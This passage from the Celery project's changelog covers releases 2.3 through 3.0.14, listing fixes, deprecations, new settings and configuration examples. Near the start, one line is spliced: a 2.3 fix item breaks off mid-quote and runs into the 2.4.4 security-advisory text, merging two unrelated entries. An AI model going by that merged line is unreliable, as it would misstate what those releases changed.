``timeout``, ``propagate`` and ``interval`` arguments. * ``with_default_connection`` -> ``with default_connection`` * TaskPool.apply_async: Keyword arguments ``callbacks`` and ``errbacks`` has been renamed to ``callback`` and ``errback`` and take a single scalar value instead of a list. 
* No longer propagates errors occurring during process cleanup (Issue #365) * Added ``TaskSetResult.delete()``, which will delete a previously saved taskset result. * ``celerybeat`` now syncs every 3 minutes instead of only at shutdown (Issue #382). * Monitors now properly handles unknown events, so user-defined events are displayed. * Terminating a task on Windows now also terminates all of the tasks child processes (Issue #384). * worker: ``-I|--include`` option now always searches the current directory to import the specified modules. * Cassandra backend: Now expires results by using TTLs. * Functional test suite in ``funtests`` is now actually working properly, and passing tests. .. _v230-fixes: Fixes ----- * ``celeryev`` was trying to create the pidfile twice. * celery.contrib.batches: Fixed problem where tasks failed silently (Issue #393). * Fixed an issue where logging objects would give "`/ :option:`--gid ` arguments to :program:`celery multi`, :program:`celeryd_detach`, :program:`celery beat` and :program:`celery events` were used. This means privileges weren't properly dropped, and that it would be possible to regain supervisor privileges later. .. _`CELERYSA-0001`: https://github.com/celery/celery/tree/master/docs/sec/CELERYSA-0001.txt .. _v244-fixes: Fixes ----- * Processes pool: Fixed rare deadlock at shutdown (Issue #523). Fix contributed by Ionel Maries Christian. * Webhook tasks issued the wrong HTTP POST headers (Issue #515). The *Content-Type* header has been changed from ``application/json`` ⇒ ``application/x-www-form-urlencoded``, and adds a proper *Content-Length* header. Fix contributed by Mitar. * Daemonization tutorial: Adds a configuration example using Django and virtualenv together (Issue #505). Contributed by Juan Ignacio Catalano. * generic init-scripts now automatically creates log and pid file directories (Issue #545). Contributed by Chris Streeter. .. _version-2.4.3: 2.4.3 ===== :release-date: 2011-11-22 06:00 p.m. GMT :release-by: Ask Solem * Fixes module import typo in `celeryctl` (Issue #538). Fix contributed by Chris Streeter. .. _version-2.4.2: 2.4.2 ===== :release-date: 2011-11-14 12:00 p.m. GMT :release-by: Ask Solem * Program module no longer uses relative imports so that it's possible to do ``python -m celery.bin.name``. .. _version-2.4.1: 2.4.1 ===== :release-date: 2011-11-07 06:00 p.m. GMT :release-by: Ask Solem * ``celeryctl inspect`` commands was missing output. * processes pool: Decrease polling interval for less idle CPU usage. * processes pool: MaybeEncodingError wasn't wrapped in ExceptionInfo (Issue #524). * worker: would silence errors occurring after task consumer started. * logging: Fixed a bug where unicode in stdout redirected log messages couldn't be written (Issue #522). .. _version-2.4.0: 2.4.0 ===== :release-date: 2011-11-04 04:00 p.m. GMT :release-by: Ask Solem .. _v240-important: Important Notes --------------- * Now supports Python 3. * Fixed deadlock in worker process handling (Issue #496). A deadlock could occur after spawning new child processes because the logging library's mutex wasn't properly reset after fork. The symptoms of this bug affecting would be that the worker simply stops processing tasks, as none of the workers child processes are functioning. There was a greater chance of this bug occurring with ``maxtasksperchild`` or a time-limit enabled. This is a workaround for http://bugs.python.org/issue6721#msg140215. 
Be aware that while this fixes the logging library lock, there could still be other locks initialized in the parent process, introduced by custom code. Fix contributed by Harm Verhagen. * AMQP Result backend: Now expires results by default. The default expiration value is now taken from the :setting:`CELERY_TASK_RESULT_EXPIRES` setting. The old :setting:`CELERY_AMQP_TASK_RESULT_EXPIRES` setting has been deprecated and will be removed in version 4.0. Note that this means that the result backend requires RabbitMQ 2.1.0 or higher, and that you have to disable expiration if you're running with an older version. You can do so by disabling the :setting:`CELERY_TASK_RESULT_EXPIRES` setting:: CELERY_TASK_RESULT_EXPIRES = None * Eventlet: Fixed problem with shutdown (Issue #457). * Broker transports can be now be specified using URLs The broker can now be specified as a URL instead. This URL must have the format: .. code-block:: text transport://user:password@hostname:port/virtual_host for example the default broker is written as: .. code-block:: text amqp://guest:guest@localhost:5672// The scheme is required, so that the host is identified as a URL and not just a host name. User, password, port and virtual_host are optional and defaults to the particular transports default value. .. note:: Note that the path component (virtual_host) always starts with a forward-slash. This is necessary to distinguish between the virtual host ``''`` (empty) and ``'/'``, which are both acceptable virtual host names. A virtual host of ``'/'`` becomes: .. code-block:: text amqp://guest:guest@localhost:5672// and a virtual host of ``''`` (empty) becomes: .. code-block:: text amqp://guest:guest@localhost:5672/ So the leading slash in the path component is **always required**. In addition the :setting:`BROKER_URL` setting has been added as an alias to ``BROKER_HOST``. Any broker setting specified in both the URL and in the configuration will be ignored, if a setting isn't provided in the URL then the value from the configuration will be used as default. Also, programs now support the :option:`--broker ` option to specify a broker URL on the command-line: .. code-block:: console $ celery worker -b redis://localhost $ celery inspect -b amqp://guest:guest@localhost//e The environment variable :envvar:`CELERY_BROKER_URL` can also be used to easily override the default broker used. * The deprecated :func:`celery.loaders.setup_loader` function has been removed. * The :setting:`CELERY_TASK_ERROR_WHITELIST` setting has been replaced by a more flexible approach (Issue #447). The error mail sending logic is now available as ``Task.ErrorMail``, with the implementation (for reference) in :mod:`celery.utils.mail`. The error mail class can be sub-classed to gain complete control of when error messages are sent, thus removing the need for a separate white-list setting. The :setting:`CELERY_TASK_ERROR_WHITELIST` setting has been deprecated, and will be removed completely in version 4.0. 
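A hedged sketch of what such an ``ErrorMail`` subclass could look like (the ``should_send`` hook and the decorator keyword are assumptions about the 2.4-era API, not statements from this changelog):

.. code-block:: python

    from celery.task import task
    from celery.utils.mail import ErrorMail

    class SelectiveErrorMail(ErrorMail):
        # assumed hook: return False to suppress the error e-mail for this exception
        def should_send(self, context, exc):
            return not isinstance(exc, KeyError)

    @task(ErrorMail=SelectiveErrorMail)
    def add(x, y):
        return x + y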
* Additional Deprecations The following functions has been deprecated and is scheduled for removal in version 4.0: ===================================== =================================== **Old function** **Alternative** ===================================== =================================== `celery.loaders.current_loader` `celery.current_app.loader` `celery.loaders.load_settings` `celery.current_app.conf` `celery.execute.apply` `Task.apply` `celery.execute.apply_async` `Task.apply_async` `celery.execute.delay_task` `celery.execute.send_task` ===================================== =================================== The following settings has been deprecated and is scheduled for removal in version 4.0: ===================================== =================================== **Old setting** **Alternative** ===================================== =================================== `CELERYD_LOG_LEVEL` ``celery worker --loglevel=`` `CELERYD_LOG_FILE` ``celery worker --logfile=`` `CELERYBEAT_LOG_LEVEL` ``celery beat --loglevel=`` `CELERYBEAT_LOG_FILE` ``celery beat --logfile=`` `CELERYMON_LOG_LEVEL` ``celerymon --loglevel=`` `CELERYMON_LOG_FILE` ``celerymon --logfile=`` ===================================== =================================== .. _v240-news: News ---- * No longer depends on :pypi:`pyparsing`. * Now depends on Kombu 1.4.3. * CELERY_IMPORTS can now be a scalar value (Issue #485). It's too easy to forget to add the comma after the sole element of a tuple, and this is something that often affects newcomers. The docs should probably use a list in examples, as using a tuple for this doesn't even make sense. Nonetheless, there are many tutorials out there using a tuple, and this change should be a help to new users. Suggested by :github_user:`jsaxon-cars`. * Fixed a memory leak when using the thread pool (Issue #486). Contributed by Kornelijus Survila. * The ``statedb`` wasn't saved at exit. This has now been fixed and it should again remember previously revoked tasks when a ``--statedb`` is enabled. * Adds :setting:`EMAIL_USE_TLS` to enable secure SMTP connections (Issue #418). Contributed by Stefan Kjartansson. * Now handles missing fields in task messages as documented in the message format documentation. * Missing required field throws :exc:`~@InvalidTaskError` * Missing args/kwargs is assumed empty. Contributed by Chris Chamberlin. * Fixed race condition in :mod:`celery.events.state` (``celerymon``/``celeryev``) where task info would be removed while iterating over it (Issue #501). * The Cache, Cassandra, MongoDB, Redis and Tyrant backends now respects the :setting:`CELERY_RESULT_SERIALIZER` setting (Issue #435). This means that only the database (Django/SQLAlchemy) backends currently doesn't support using custom serializers. Contributed by Steeve Morin * Logging calls no longer manually formats messages, but delegates that to the logging system, so tools like Sentry can easier work with the messages (Issue #445). Contributed by Chris Adams. * ``multi`` now supports a ``stop_verify`` command to wait for processes to shutdown. * Cache backend didn't work if the cache key was unicode (Issue #504). Fix contributed by Neil Chintomby. * New setting :setting:`CELERY_RESULT_DB_SHORT_LIVED_SESSIONS` added, which if enabled will disable the caching of SQLAlchemy sessions (Issue #449). Contributed by Leo Dirac. * All result backends now implements ``__reduce__`` so that they can be pickled (Issue #441). Fix contributed by Remy Noel * multi didn't work on Windows (Issue #472). 
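For the short-lived sessions setting mentioned a few items above, a minimal configuration sketch (the database URI is an assumption for illustration only):

.. code-block:: python

    CELERY_RESULT_BACKEND = 'database'
    CELERY_RESULT_DBURI = 'sqlite:///results.db'      # assumed example URI
    CELERY_RESULT_DB_SHORT_LIVED_SESSIONS = True      # disable SQLAlchemy session caching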
* New-style ``CELERY_REDIS_*`` settings now take precedence over the old ``REDIS_*`` configuration keys (Issue #508). Fix contributed by Joshua Ginsberg. * Generic beat init-script no longer sets `bash -e` (Issue #510). Fix contributed by Roger Hu. * Documented that Chords don't work well with :command:`redis-server` versions before 2.2. Contributed by Dan McGee. * The :setting:`CELERYBEAT_MAX_LOOP_INTERVAL` setting wasn't respected. * ``inspect.registered_tasks`` renamed to ``inspect.registered`` for naming consistency. The previous name is still available as an alias. Contributed by Mher Movsisyan. * Worker logged the string representation of args and kwargs without safeguards (Issue #480). * RHEL init-script: Changed worker start-up priority. The default start / stop priorities for MySQL on RHEL are: .. code-block:: console # chkconfig: - 64 36 Therefore, if Celery is using a database as a broker / message store, it should be started after the database is up and running, otherwise errors will ensue. This commit changes the priority in the init-script to: .. code-block:: console # chkconfig: - 85 15 which are the default recommended settings for third-party applications, and ensure that Celery is started after the database service and shut down before it terminates. Contributed by Yury V. Zaytsev. * KeyValueStoreBackend.get_many didn't respect the ``timeout`` argument (Issue #512). * beat/events: the ``--workdir`` option didn't :manpage:`chdir(2)` before the configuration was read (Issue #506). * After deprecating 2.4 support we can now name modules correctly, since we can make use of absolute imports. Therefore the following internal modules have been renamed: ``celery.concurrency.evlet`` -> ``celery.concurrency.eventlet`` ``celery.concurrency.evg`` -> ``celery.concurrency.gevent`` * The :file:`AUTHORS` file is now sorted alphabetically. Also, as you may have noticed, the contributors of new features/fixes are now mentioned in the Changelog. .. _changelog-2.5: =============================== Change history for Celery 2.5 =============================== This document contains change notes for bugfix releases in the 2.5.x series; please see :ref:`whatsnew-2.5` for an overview of what's new in Celery 2.5. If you're looking for versions prior to 2.5 you should visit our :ref:`history` of releases. .. contents:: :local: .. _version-2.5.5: 2.5.5 ===== :release-date: 2012-06-06 04:00 p.m. BST :release-by: Ask Solem This is a dummy release performed for the following goals: - Protect against force upgrading to Kombu 2.2.0 - Version parity with :pypi:`django-celery` .. _version-2.5.3: 2.5.3 ===== :release-date: 2012-04-16 07:00 p.m. BST :release-by: Ask Solem * A bug caused messages to be sent with UTC time-stamps even though :setting:`CELERY_ENABLE_UTC` wasn't enabled (Issue #636). * ``celerybeat``: No longer crashes if an entry's args is set to None (Issue #657). * Auto-reload didn't work if a module's ``__file__`` attribute was set to the module's ``.pyc`` file (Issue #647). * Fixes early 2.5 compatibility where ``__package__`` doesn't exist (Issue #638). .. _version-2.5.2: 2.5.2 ===== :release-date: 2012-04-13 04:30 p.m. GMT :release-by: Ask Solem .. _v252-news: News ---- - Now depends on Kombu 2.1.5. - Django documentation has been moved to the main Celery docs.
See :ref:`django`. - New :signal:`celeryd_init` signal can be used to configure workers by hostname. - Signal.connect can now be used as a decorator. Example: .. code-block:: python from celery.signals import task_sent @task_sent.connect def on_task_sent(**kwargs): print('sent task: %r' % (kwargs,)) - Invalid task messages are now rejected instead of acked. This means that they will be moved to the dead-letter queue introduced in the latest RabbitMQ version (but must be enabled manually, consult the RabbitMQ documentation). - Internal logging calls have been cleaned up to work better with tools like Sentry. Contributed by David Cramer. - New method ``subtask.clone()`` can be used to clone an existing subtask with augmented arguments/options. Example: .. code-block:: pycon >>> s = add.subtask((5,)) >>> new = s.clone(args=(10,), countdown=5) >>> new.args (10, 5) >>> new.options {'countdown': 5} - Chord callbacks are now triggered in eager mode. .. _v252-fixes: Fixes ----- - Programs now verify that the pidfile is actually written correctly (Issue #641). Hopefully this will crash the worker immediately if the system is out of space to store the complete pidfile. In addition, we now verify that existing pidfiles contain a newline so that a partially written pidfile is detected as broken; before this, doing: .. code-block:: console $ echo -n "1" > celeryd.pid would cause the worker to think that an existing instance was already running (init has pid 1 after all). - Fixed 2.5 compatibility issue with use of print_exception. Fix contributed by Martin Melin. - Fixed 2.5 compatibility issue with imports. Fix contributed by Iurii Kriachko. - All programs now fix up ``__package__`` when called as main. This fixes compatibility with Python 2.5. Fix contributed by Martin Melin. - [celery control|inspect] can now be configured on the command-line. Like with the worker, it's now possible to configure Celery settings on the command-line for celery control|inspect: .. code-block:: console $ celery inspect -- broker.pool_limit=30 - Version dependency for :pypi:`python-dateutil` fixed to be strict. Fix contributed by Thomas Meson. - ``Task.__call__`` is now optimized away in the task tracer rather than when the task class is created. This fixes a bug where a custom __call__ may mysteriously disappear. - Auto-reload's ``inotify`` support has been improved. Contributed by Mher Movsisyan. - The Django broker documentation has been improved. - Removed confusing warning at top of routing user guide. .. _version-2.5.1: 2.5.1 ===== :release-date: 2012-03-01 01:00 p.m. GMT :release-by: Ask Solem .. _v251-fixes: Fixes ----- * Eventlet/Gevent: A small typo caused the worker to hang when eventlet/gevent was used; this was because the environment wasn't monkey patched early enough. * Eventlet/Gevent: Another small typo caused the mediator to be started with eventlet/gevent, which would make the worker sometimes hang at shutdown. * :mod:`multiprocessing`: Fixed an error occurring if the pool was stopped before it was properly started. * Proxy objects now redirect ``__doc__`` and ``__name__`` so ``help(obj)`` works. * Internal timer (timer2) now logs exceptions instead of swallowing them (Issue #626). * celery shell: can now be started with :option:`--eventlet ` or :option:`--gevent ` options to apply their monkey patches. .. _version-2.5.0: 2.5.0 ===== :release-date: 2012-02-24 04:00 p.m. GMT :release-by: Ask Solem See :ref:`whatsnew-2.5`.
Since the changelog has gained considerable size, we decided to do things differently this time: by having separate "what's new" documents for major version changes. Bugfix releases will still be found in the changelog. .. _changelog-3.0: =============================== Change history for Celery 3.0 =============================== .. contents:: :local: If you're looking for versions prior to 3.0.x you should go to :ref:`history`. .. _version-3.0.24: 3.0.24 ====== :release-date: 2013-10-11 04:40 p.m. BST :release-by: Ask Solem - Now depends on :ref:`Kombu 2.5.15 `. - Now depends on :pypi:`billiard` version 2.7.3.34. - AMQP Result backend: No longer caches queue declarations. The queues created by the AMQP result backend are always unique, so caching the declarations caused a slow memory leak. - Worker: Fixed crash when hostname contained Unicode characters. Contributed by Daodao. - The worker would no longer start if the `-P solo` pool was selected (Issue #1548). - Redis/Cache result backends wouldn't complete chords if any of the tasks were retried (Issue #1401). - Task decorator is no longer lazy if app is finalized. - AsyncResult: Fixed bug with ``copy(AsyncResult)`` when no ``current_app`` available. - ResultSet: Now properly propagates app when passed string id's. - Loader now ignores :envvar:`CELERY_CONFIG_MODULE` if value is empty string. - Fixed race condition in Proxy object where it tried to delete an attribute twice, resulting in :exc:`AttributeError`. - Task methods now works with the :setting:`CELERY_ALWAYS_EAGER` setting (Issue #1478). - :class:`~kombu.common.Broadcast` queues were accidentally declared when publishing tasks (Issue #1540). - New :envvar:`C_FAKEFORK` environment variable can be used to debug the init-scripts. Setting this will skip the daemonization step so that errors printed to stderr after standard outs are closed can be seen: .. code-block:: console $ C_FAKEFORK /etc/init.d/celeryd start This works with the `celery multi` command in general. - ``get_pickleable_etype`` didn't always return a value (Issue #1556). - Fixed bug where ``app.GroupResult.restore`` would fall back to the default app. - Fixed rare bug where built-in tasks would use the current_app. - :func:`~celery.platforms.maybe_fileno` now handles :exc:`ValueError`. .. _version-3.0.23: 3.0.23 ====== :release-date: 2013-09-02 01:00 p.m. BST :release-by: Ask Solem - Now depends on :ref:`Kombu 2.5.14 `. - ``send_task`` didn't honor ``link`` and ``link_error`` arguments. This had the side effect of chains not calling unregistered tasks, silently discarding them. Fix contributed by Taylor Nelson. - :mod:`celery.state`: Optimized precedence lookup. Contributed by Matt Robenolt. - POSIX: Daemonization didn't redirect ``sys.stdin`` to ``/dev/null``. Fix contributed by Alexander Smirnov. - Canvas: group bug caused fallback to default app when ``.apply_async`` used (Issue #1516) - Canvas: generator arguments wasn't always pickleable. .. _version-3.0.22: 3.0.22 ====== :release-date: 2013-08-16 04:30 p.m. BST :release-by: Ask Solem - Now depends on :ref:`Kombu 2.5.13 `. - Now depends on :pypi:`billiard` 2.7.3.32 - Fixed bug with monthly and yearly Crontabs (Issue #1465). Fix contributed by Guillaume Gauvrit.
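As an illustration of the kind of schedule affected by the Crontab fix above, a minimal sketch (the task name and the schedule values are placeholders):

.. code-block:: python

    from celery.schedules import crontab

    CELERYBEAT_SCHEDULE = {
        'monthly-report': {
            'task': 'tasks.send_report',                              # placeholder task name
            'schedule': crontab(minute=0, hour=0, day_of_month='1'),  # first day of every month
        },
    }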
- Fixed memory leak caused by time limits (Issue #1129, Issue #1427) - Worker will now sleep if being restarted more than 5 times in one second to avoid spamming with ``worker-online`` events. - Includes documentation fixes Contributed by: Ken Fromm, Andreas Savvides, Alex Kiriukha, Michael Fladischer. .. _version-3.0.21: 3.0.21 ====== :release-date: 2013-07-05 04:30 p.m. BST :release-by: Ask Solem - Now depends on :pypi:`billiard` 2.7.3.31. This version fixed a bug when running without the billiard C extension. - 3.0.20 broke eventlet/gevent support (worker not starting). - Fixed memory leak problem when MongoDB result backend was used with the gevent pool. Fix contributed by Ross Lawley. .. _version-3.0.20: 3.0.20 ====== :release-date: 2013-06-28 04:00 p.m. BST :release-by: Ask Solem - Contains workaround for deadlock problems. A better solution will be part of Celery 3.1. - Now depends on :ref:`Kombu 2.5.12 `. - Now depends on :pypi:`billiard` 2.7.3.30. - :option:`--loader ` argument no longer supported importing loaders from the current directory. - [Worker] Fixed memory leak when restarting after connection lost (Issue #1325). - [Worker] Fixed UnicodeDecodeError at start-up (Issue #1373). Fix contributed by Jessica Tallon. - [Worker] Now properly rewrites unpickleable exceptions again. - Fixed possible race condition when evicting items from the revoked task set. - [generic-init.d] Fixed compatibility with Ubuntu's minimal Dash shell (Issue #1387). Fix contributed by :github_user:`monkut`. - ``Task.apply``/``ALWAYS_EAGER`` now also executes callbacks and errbacks (Issue #1336). - [Worker] The :signal:`worker-shutdown` signal was no longer being dispatched (Issue #1339)j - [Python 3] Fixed problem with threading.Event. Fix contributed by Xavier Ordoquy. - [Python 3] Now handles ``io.UnsupportedOperation`` that may be raised by ``file.fileno()`` in Python 3. - [Python 3] Fixed problem with ``qualname``. - [events.State] Now ignores unknown event-groups. - [MongoDB backend] No longer uses deprecated ``safe`` parameter. Fix contributed by :github_user:`rfkrocktk`. - The eventlet pool now imports on Windows. - [Canvas] Fixed regression where immutable chord members may receive arguments (Issue #1340). Fix contributed by Peter Brook. - [Canvas] chain now accepts generator argument again (Issue #1319). - ``celery.migrate`` command now consumes from all queues if no queues specified. Fix contributed by John Watson. .. _version-3.0.19: 3.0.19 ====== :release-date: 2013-04-17 04:30:00 p.m. BST :release-by: Ask Solem - Now depends on :pypi:`billiard` 2.7.3.28 - A Python 3 related fix managed to disable the deadlock fix announced in 3.0.18. Tests have been added to make sure this doesn't happen again. - Task retry policy: Default max_retries is now 3. This ensures clients won't be hanging while the broker is down. .. note:: You can set a longer retry for the worker by using the :signal:`celeryd_after_setup` signal: .. code-block:: python from celery.signals import celeryd_after_setup @celeryd_after_setup.connect def configure_worker(instance, conf, **kwargs): conf.CELERY_TASK_PUBLISH_RETRY_POLICY = { 'max_retries': 100, 'interval_start': 0, 'interval_max': 1, 'interval_step': 0.2, } - Worker: Will now properly display message body in error messages even if the body is a buffer instance. - 3.0.18 broke the MongoDB result backend (Issue #1303). .. _version-3.0.18: 3.0.18 ====== :release-date: 2013-04-12 05:00:00 p.m. BST :release-by: Ask Solem - Now depends on :pypi:`kombu` 2.5.10. 
See the :ref:`kombu changelog `. - Now depends on :pypi:`billiard` 2.7.3.27. - Can now specify a white-list of accepted serializers using the new :setting:`CELERY_ACCEPT_CONTENT` setting. This means that you can force the worker to discard messages serialized with pickle and other untrusted serializers. For example to only allow JSON serialized messages use:: CELERY_ACCEPT_CONTENT = ['json'] you can also specify MIME types in the white-list:: CELERY_ACCEPT_CONTENT = ['application/json'] - Fixed deadlock in multiprocessing's pool caused by the semaphore not being released when terminated by signal. - Processes Pool: It's now possible to debug pool processes using GDB. - ``celery report`` now censors possibly secret settings, like passwords and secret tokens. You should still check the output before pasting anything on the internet. - Connection URLs now ignore multiple '+' tokens. - Worker/``statedb``: Now uses pickle protocol 2 (Python 2.5+) - Fixed Python 3 compatibility issues. - Worker: A warning is now given if a worker is started with the same node name as an existing worker. - Worker: Fixed a deadlock that could occur while revoking tasks (Issue #1297). - Worker: The :sig:`HUP` handler now closes all open file descriptors before restarting to ensure file descriptors doesn't leak (Issue #1270). - Worker: Optimized storing/loading the revoked tasks list (Issue #1289). After this change the :option:`celery worker --statedb` file will take up more disk space, but loading from and storing the revoked tasks will be considerably faster (what before took 5 minutes will now take less than a second). - Celery will now suggest alternatives if there's a typo in the broker transport name (e.g., ``ampq`` -> ``amqp``). - Worker: The auto-reloader would cause a crash if a monitored file was unlinked. Fix contributed by Agris Ameriks. - Fixed AsyncResult pickling error. Fix contributed by Thomas Minor. - Fixed handling of Unicode in logging output when using log colors (Issue #427). - :class:`~celery.app.utils.ConfigurationView` is now a ``MutableMapping``. Contributed by Aaron Harnly. - Fixed memory leak in LRU cache implementation. Fix contributed by Romuald Brunet. - ``celery.contrib.rdb``: Now works when sockets are in non-blocking mode. Fix contributed by Theo Spears. - The `inspect reserved` remote control command included active (started) tasks with the reserved tasks (Issue #1030). - The :signal:`task_failure` signal received a modified traceback object meant for pickling purposes, this has been fixed so that it now receives the real traceback instead. - The ``@task`` decorator silently ignored positional arguments, it now raises the expected :exc:`TypeError` instead (Issue #1125). - The worker will now properly handle messages with invalid ETA/expires fields (Issue #1232). - The ``pool_restart`` remote control command now reports an error if the :setting:`CELERYD_POOL_RESTARTS` setting isn't set. - :meth:`@add_defaults`` can now be used with non-dict objects. - Fixed compatibility problems in the Proxy class (Issue #1087). The class attributes ``__module__``, ``__name__`` and ``__doc__`` are now meaningful string objects. Thanks to Marius Gedminas. - MongoDB Backend: The :setting:`MONGODB_BACKEND_SETTINGS` setting now accepts a ``option`` key that lets you forward arbitrary kwargs to the underlying ``pymongo.Connection`` object (Issue #1015). - Beat: The daily backend cleanup task is no longer enabled for result backends that support automatic result expiration (Issue #1031). 
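For the MongoDB ``option`` key described above, a hedged configuration sketch (the connection details and the forwarded keyword are assumptions about :pypi:`pymongo`, not taken from this changelog):

.. code-block:: python

    CELERY_RESULT_BACKEND = 'mongodb'
    CELERY_MONGODB_BACKEND_SETTINGS = {
        'host': 'localhost',              # assumed connection details
        'database': 'celery_results',
        'option': {                       # forwarded to the underlying pymongo.Connection
            'max_pool_size': 10,
        },
    }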
- Canvas list operations now takes application instance from the first task in the list, instead of depending on the ``current_app`` (Issue #1249). - Worker: Message decoding error log message now includes traceback information. - Worker: The start-up banner now includes system platform. - ``celery inspect|status|control`` now gives an error if used with a SQL based broker transport. .. _version-3.0.17: 3.0.17 ====== :release-date: 2013-03-22 04:00:00 p.m. UTC :release-by: Ask Solem - Now depends on kombu 2.5.8 - Now depends on billiard 2.7.3.23 - RabbitMQ/Redis: thread-less and lock-free rate-limit implementation. This means that rate limits pose minimal overhead when used with RabbitMQ/Redis or future transports using the event-loop, and that the rate-limit implementation is now thread-less and lock-free. The thread-based transports will still use the old implementation for now, but the plan is to use the timer also for other broker transports in Celery 3.1. - Rate limits now works with eventlet/gevent if using RabbitMQ/Redis as the broker. - A regression caused ``task.retry`` to ignore additional keyword arguments. Extra keyword arguments are now used as execution options again. Fix contributed by Simon Engledew. - Windows: Fixed problem with the worker trying to pickle the Django settings module at worker start-up. - generic-init.d: No longer double quotes ``$CELERYD_CHDIR`` (Issue #1235). - generic-init.d: Removes bash-specific syntax. Fix contributed by Pär Wieslander. - Cassandra Result Backend: Now handles the :exc:`~pycassa.AllServersUnavailable` error (Issue #1010). Fix contributed by Jared Biel. - Result: Now properly forwards apps to GroupResults when deserializing (Issue #1249). Fix contributed by Charles-Axel Dein. - ``GroupResult.revoke`` now supports the ``terminate`` and ``signal`` keyword arguments. - Worker: Multiprocessing pool workers now import task modules/configuration before setting up the logging system so that logging signals can be connected before they're dispatched. - chord: The ``AsyncResult`` instance returned now has its ``parent`` attribute set to the header ``GroupResult``. This is consistent with how ``chain`` works. .. _version-3.0.16: 3.0.16 ====== :release-date: 2013-03-07 04:00:00 p.m. UTC :release-by: Ask Solem - Happy International Women's Day! We have a long way to go, so this is a chance for you to get involved in one of the organizations working for making our communities more diverse. - PyLadies — http://pyladies.com - Girls Who Code — http://www.girlswhocode.com - Women Who Code — http://www.meetup.com/Women-Who-Code-SF/ - Now depends on :pypi:`kombu` version 2.5.7 - Now depends on :pypi:`billiard` version 2.7.3.22 - AMQP heartbeats are now disabled by default. Some users experiences issues with heartbeats enabled, and it's not strictly necessary to use them. If you're experiencing problems detecting connection failures, you can re-enable heartbeats by configuring the :setting:`BROKER_HEARTBEAT` setting. - Worker: Now propagates connection errors occurring in multiprocessing callbacks, so that the connection can be reset (Issue #1226). - Worker: Now propagates connection errors occurring in timer callbacks, so that the connection can be reset. - The modules in :setting:`CELERY_IMPORTS` and :setting:`CELERY_INCLUDE` are now imported in the original order (Issue #1161). The modules in :setting:`CELERY_IMPORTS` will be imported first, then continued by :setting:`CELERY_INCLUDE`. Thanks to Joey Wilhelm. 
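A minimal sketch of the two settings whose import order is described above (the module names are placeholders):

.. code-block:: python

    # Modules are imported in the order listed: CELERY_IMPORTS first, then CELERY_INCLUDE.
    CELERY_IMPORTS = ('myapp.tasks',)          # placeholder module names
    CELERY_INCLUDE = ('myapp.extra_tasks',)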
- New bash completion for ``celery`` available in the git repository: https://github.com/celery/celery/tree/3.0/extra/bash-completion You can source this file or put it in ``bash_completion.d`` to get auto-completion for the ``celery`` command-line utility. - The node name of a worker can now include unicode characters (Issue #1186). - The repr of a ``crontab`` object now displays correctly (Issue #972). - ``events.State`` no longer modifies the original event dictionary. - No longer uses ``Logger.warn`` deprecated in Python 3. - Cache Backend: Now works with chords again (Issue #1094). - Chord unlock now handles errors occurring while calling the callback. - Generic worker init.d script: Status check is now performed by querying the pid of the instance instead of sending messages. Contributed by Milen Pavlov. - Improved init-scripts for CentOS. - Updated to support Celery 3.x conventions. - Now uses CentOS built-in ``status`` and ``killproc`` - Support for multi-node / multi-pid worker services. - Standard color-coded CentOS service-init output. - A test suite. Contributed by Milen Pavlov. - ``ResultSet.join`` now always works with empty result set (Issue #1219). - A ``group`` consisting of a single task is now supported (Issue #1219). - Now supports the ``pycallgraph`` program (Issue #1051). - Fixed Jython compatibility problems. - Django tutorial: Now mentions that the example app must be added to ``INSTALLED_APPS`` (Issue #1192). .. _version-3.0.15: 3.0.15 ====== :release-date: 2013-02-11 04:30:00 p.m. UTC :release-by: Ask Solem - Now depends on billiard 2.7.3.21 which fixed a syntax error crash. - Fixed bug with :setting:`CELERY_SEND_TASK_SENT_EVENT`. .. _version-3.0.14: 3.0.14 ====== :release-date: 2013-02-08 05:00:00 p.m. UTC :release-by: Ask Solem - Now depends on Kombu 2.5.6 - Now depends on billiard 2.7.3.20 - ``execv`` is now disabled by default. It was causing too many problems for users, you can still enable it using the `CELERYD_FORCE_EXECV` setting. execv was only enabled when transports other than AMQP/Redis was used, and it's there to prevent deadlocks caused by mutexes not being released before the process forks. Unfortunately it also changes the environment introducing many corner case bugs that're hard to fix without adding horrible hacks. Deadlock issues are reported far less often than the bugs that execv are causing, so we now disable it by default. Work is in motion to create non-blocking versions of these transports so that execv isn't necessary (which is the situation with the amqp and redis broker transports) - Chord exception behavior defined (Issue #1172). From Celery 3.1 the chord callback will change state to FAILURE when a task part of a chord raises an exception. It was never documented what happens in this case, and the actual behavior was very unsatisfactory, indeed it will just forward the exception value to the chord callback. For backward compatibility reasons we don't change to the new behavior in a bugfix release, even if the current behavior was never documented. Instead you can enable the :setting:`CELERY_CHORD_PROPAGATES` setting to get the new behavior that'll be default from Celery 3.1. See more at :ref:`chord-errors`. - worker: Fixes bug with ignored and retried tasks. The ``on_chord_part_return`` and ``Task.after_return`` callbacks, nor the ``task_postrun`` signal should be called when the task was retried/ignored. Fix contributed by Vlad. - ``GroupResult.join_native`` now respects the ``propagate`` argument. 
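A hedged sketch of the ``propagate`` behavior noted above (the task and module names are placeholders; with ``propagate=False`` errors come back as return values instead of being raised):

.. code-block:: python

    from celery import group
    from myapp.tasks import add   # placeholder task module

    res = group(add.s(i, i) for i in range(10)).apply_async()
    values = res.join_native(propagate=False)   # exceptions are returned, not raised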
- ``subtask.id`` added as an alias to ``subtask['options'].id`` .. code-block:: pycon >>> s = add.s(2, 2) >>> s.id = 'my-id' >>> s['options'] {'task_id': 'my-id'} >>> s.id 'my-id' - worker: Fixed error `Could not start worker processes` occurring when restarting after connection failure (Issue #1118). - Adds new signal :signal:`task-retried` (Issue #1169). - `celery events --dumper` now handles connection loss. - Will now retry sending the task-sent event in case of connection failure. - amqp backend: Now uses ``Message.requeue`` instead of republishing the message after poll. - New :setting:`BROKER_HEARTBEAT_CHECKRATE` setting introduced to modify the rate at which broker connection heartbeats are monitored. The default value was also changed from 3.0 to 2.0. - :class:`celery.events.state.State` is now pickleable. Fix contributed by Mher Movsisyan. - :class:`celery.utils.functional.LRUCache` is now pickleable. Fix contributed by Mher Movsisyan. - The stats broadcast command now includes the workers pid. Contributed by Mher Movsisyan. - New ``conf`` remote control command to get a workers current configuration. Contributed by Mher Movsisyan. - Adds the ability to modify the chord unlock task's countdown argument (Issue #1146). Contributed by Jun Sakai - beat: The scheduler now uses the `now()`` method of the schedule, so that schedules can provide a custom way to get the current date and time. Contributed by Raphaël Slinckx - Fixed pickling of configuration modules on Windows or when execv is used (Issue #1126). - Multiprocessing logger is now configured with loglevel ``ERROR`` by default. Since 3.0 the multiprocessing loggers were disabled by 